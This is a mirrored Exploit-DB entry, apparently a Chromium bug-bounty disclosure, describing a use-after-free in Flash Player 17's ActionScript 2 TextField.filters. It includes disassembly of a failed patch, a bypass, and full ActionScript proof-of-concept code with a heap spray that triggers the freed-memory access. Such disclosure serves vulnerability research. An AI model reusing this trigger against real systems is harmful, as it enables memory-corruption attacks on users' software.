bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/37847.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

147 lines
No EOL
4.9 KiB
Text
Raw Blame History

Source: https://code.google.com/p/google-security-research/issues/detail?id=330&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=476926]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected.
VERSION
Chrome Version: [?, Flash 17.0.0.169]
Operating System: [Windows 7 x64 SP1]
REPRODUCTION CASE
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Note: Flash 17.0.0.169 tried to patch the previous issue by setting an "in used" flag on the targeted filter (flashplayer17_sa.exe 17.0.0.169):
.text:004D67F8 mov esi, [esp+1Ch+var_4]
.text:004D67FC push 1 ; char
.text:004D67FE mov ecx, ebp ; int
.text:004D6800 mov byte ptr [esi+0Ch], 1 // this flag was added
.text:004D6804 call xparseAS2Code
.text:004D6809 mov byte ptr [esi+0Ch], 0
And when we check the function that deletes the filters:
.text:004D66D0 push edi
.text:004D66D1 mov edi, ecx
.text:004D66D3 cmp byte ptr [edi+0Ch], 0 // check again the flag, and jump if it is set, so that the filter won't be deleted
.text:004D66D7 jnz short loc_4D6716
.text:004D66D9 cmp dword ptr [edi], 0
.text:004D66DC jz short loc_4D6708
We can bypass that feature with the following code:
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters // set the flag to 1
--- in MyGlowFilter ---
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters // set the flag to 1, and then set it to 0
//now we can free the filter :D, the flag is set to 0!
_global.tfield.filters = []
Tested on Flash Player standalone 17.0.0.169, the updated Chrome is not available at the time of writing.
But since the objects haven't changed too much the updated version should crash while dereferencing 0x41424344.
Can't we call that a -1day :D?
***************************************************************************
Content of FiltusPafusBis.fla
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
a2[i] = 0x41424344
}
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
for (var i = 0; i<0x20;i++) {
_global.a1[0x100+i*4].tabStops = [1,2,3,4]
}
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters
_global.tfield.filters = []
for (var i = 0; i<0x200;i++) {
_global.a1[i].tabStops = a2
}
}
_global.tfield = tfield
_global.f = f
_global.a1 = a1
_global.a2 = a2
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters
***************************************************************************
Content of MyGlowFilter.as:
import flash.filters.GlowFilter;
class MyGlowFilter extends flash.filters.GlowFilter {
public function MyGlowFilter (a,b,c,d,e,f,g,h)
{
super(a,b,c,d,e,f,g,h);
_global.f()
}
}
***************************************************************************
Content of MyGlowFilter2.as:
import flash.filters.GlowFilter;
class MyGlowFilter2 extends flash.filters.GlowFilter {
public function MyGlowFilter2 (a,b,c,d,e,f,g,h)
{
super(a,b,c,d,e,f,g,h);
}
}
***************************************************************************
Content of FiltusPafusBis_poc.fla
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters
_global.tfield.filters = []
}
_global.tfield = tfield
_global.f = f
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters
---
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37847.zip
Reference in a new issue View git blame Copy permalink